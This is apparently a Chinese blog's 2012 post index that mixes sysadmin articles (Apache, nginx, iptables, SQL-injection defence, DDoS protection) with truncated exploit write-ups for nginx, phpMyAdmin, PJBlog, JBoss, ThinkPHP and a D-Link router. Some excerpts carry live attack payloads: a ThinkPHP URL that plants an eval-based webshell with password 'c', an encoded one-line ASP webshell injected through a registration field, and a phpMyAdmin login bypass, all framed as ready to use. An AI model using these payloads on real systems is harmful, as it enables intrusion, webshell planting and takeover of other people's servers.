收集盒 Book box

大多数文章收集自互联网

获取使用CDN网站的真实IP

现在很多网站用了cdn技术,在做一些测试的时候,想获取其服务器真实IP地址就有点困难,不知道现在还有其他什么好的方法呢,整理了下,目前知道如下两种:   1:拿CDN服务器 找出真实IP cache_peer 1.1.1.1 parent 80 0 no-query originserver...

2012-05-25 17:41:01

阅读数 570

评论数 0

Nmap中文版帮助

用法:nmap[扫描类型 [选项] {目标规范} 目标规范: 可以通过主机名,IP地址,网络等 例如: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254 -iL : 从列表中的主机/网络的输入 -iR : 选...

2012-05-25 17:16:19

阅读数 582

评论数 0

Ngnix空子节可远程执行代码漏洞

Ngnix 出现高危漏洞,可远程执行代码:Ngnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问 xxx.jpg%00.php来执行其中的代码。影响版本:0.5.*, 0.6.*, 0.7 <= 0.7.65, 0.8 www.t00ls...

2012-05-20 18:35:24

阅读数 1015

评论数 0

PHPmyadmin 2.11.4万能密码漏洞

PHPmyadmin 2.11.4 PHPmyadmin 2.11.3 两个版本都有此漏洞 我去测试了一下 确实可以用。。。 给你找到一个测试网址http://www.hitag.cn 你们可以试一下 只需要输入账号  密码不需要输入 利用代码如下: ‘...

2012-05-20 15:56:22

阅读数 1722

评论数 0

PJBlog 3.2.9.518 getwebshell 漏洞

作者:不走的钟   版本:PJblog 3.2.9.518(2012/5/9日时为最新版本)   漏洞利用条件:   1、使用全静态模式(默认情况是全静态模式)   2、用户可以发帖(默认普通用户不能发帖,所以有点鸡肋)   漏洞描述:P...

2012-05-20 15:55:43

阅读数 619

评论数 0

phpMyAdmin3 remote code execute php版本 exploit

来源:http://www.oldjun.com/blog/index.php/archives/81/ 最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。 昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码...

2012-05-20 15:54:35

阅读数 441

评论数 0

新云漏洞总结篇

漏洞很简单,就是插一句话到ASK的数据库, 直接访问ask,然后注册用户,密码问题这插入一句话:┼攠數畣整爠煥敵瑳∨≡┩愾 注册成功后一句话连接:ask/data/ask_newasp.asa 密码:a 1.SQL注入漏洞 注册帐号-->发布文章-->文章管...

2012-05-20 12:40:43

阅读数 3395

评论数 0

JBOSS远程代码执行漏洞

JBOSS默认配置会有一个后台漏洞,漏洞发生在jboss.deployment命名空间 中的addURL()函数,该函数可以远程下载一个war压缩包并解压 访问http://www.safe3.com.cn:8080/jmx-console/ 后台,如下图 下拉找到如下图所示...

2012-05-20 12:38:03

阅读数 438

评论数 0

thinkphp任意代码执行漏洞

http://site.com/index.php/module/action/param1/${@phpinfo()} 直接拿SHELL index.php/module/action/param1/${@eval%28$_POST[c]%29} 密码:c lib/...

2012-05-20 12:33:29

阅读数 1119

评论数 0

菜鸟玩转Apache之配置使用篇

上篇博文里写了一下Apache的几种安装方法,有rpm安装、yum安装和源码编译安装。 编译和安装完成Apache,不过是工作的开始。我们最主要的工作,是根据实际需求配置Apache,以适应各种情况。 对于rpm和yum安装的Apache,其配置文件在/etc/httpd/conf/这...

2012-05-15 12:08:31

阅读数 525

评论数 0

Linux运维的一些常见问题及解决方法

今晚有空把最近运维中遇到的一些问题及解决方法总结下,写的比较匆忙,可能有些问题和错误,请各位看官指正。 ———————————————————————————————————— 1.shell脚本死活不执行 问题:某天研发某同事找我说帮他看看他写的shell脚本,死活不执...

2012-05-15 11:06:58

阅读数 1371

评论数 0

一个经典实用的iptables shell脚本

PS:这个iptables脚本不错,很实用,根据实际应用改一下就可以自己用。分享出来,供大家来参考。原作者佚名。源代码如下: #!/bin/sh # modprobe ipt_MASQUERADE modprobe ip_conntrack_ftp modprobe ip_nat_f...

2012-05-15 11:05:42

阅读数 318

评论数 0

三个超强JSP防SQL注入攻击方法

第一种采用预编译语句集,它内置了处理SQL注入的能力,只要使用它的setString方法传值即可:   String sql= "select * from users where username=? and password=?;   PreparedStatement preS...

2012-05-15 10:25:01

阅读数 442

评论数 0

网络安全工具大汇聚

测试网站/测试场地 SPI Dynamics公司(活) - http://zero.webappsecurity.com/的 Cenzic日前发布(现场) - http://crackme.cenzic.com/ Watchfire公司(现场) - http://demo.testfir...

2012-05-15 10:14:21

阅读数 2705

评论数 0

轻量级HTTP服务器Nginx(常用配置实例)

Nginx作为一个HTTP服务器,在功能实现方面和性能方面都表现得非常卓越,完全可以与Apache相媲美,几乎可以实现Apache的所有功能,下面就介绍一些Nginx常用的配置实例,具体包含虚拟主机配置、负载均衡配置、防盗链配置以及日志管理等。   一、 虚拟主机配置实例 下面在Ngin...

2012-05-15 10:11:20

阅读数 374

评论数 0

Ubuntu的防火墙配置-ufw-iptables

自打2.4版本以后的Linux内核中, 提供了一个非常优秀的防火墙工具。这个工具可以对出入服务的网络数据进行分割、过滤、转发等等细微的控制,进而实现诸如防火墙、NAT等功能。 一般来说, 我们会使用名气比较的大iptables等程序对这个防火墙的规则进行管理。iptables可以灵活的定义防火墙...

2012-05-15 09:34:28

阅读数 426

评论数 0

找出apache日志中访问量最大的IP

最近打算换个工作环境,于是就投了几份简历,做运维的,笔试题是少不了的。 其中碰见最多的就是关于日志的统计和分析的题。 这里贴一个比较典型的出来,方便以后查阅。 原题如下: 某公司采用apache作为web服务器,其中记录客户端访问情况的日志名为,clientuser.log...

2012-05-15 09:13:45

阅读数 701

评论数 0

网站DDOS攻击防护实战老男孩经验心得分享

http://oldboy.blog.51cto.com/2561410/845349 网站DDOS攻击防护实战老男孩经验心得分享    老男孩由于要培训学生、批改作业,因此最近比较忙,还要经常写书、录视频,搞的思路混乱,受朋友邀请参加某论坛活动,推迟不过,挤了一点时间,给大家简单...

2012-05-15 09:07:24

阅读数 1187

评论数 0

waffit 一 审核您的WAF

waffit 一套安全工具,以帮助您审核您的WAF http://code.google.com/p/waffit/

2012-05-15 00:49:12

阅读数 435

评论数 0

D-Link DSL-2640U路由器0day,免密码查看PPoE账户密码

D-Link的路由器很多都有这种漏洞,不只这一款,冰山一角而已,把下面代码保存为html文件就可以了。 1 html> 2 body onload="javascript:document.forms[...

2012-05-14 16:32:13

阅读数 1022

评论数 0

提示
确定要删除当前文章?
取消 删除
关闭
关闭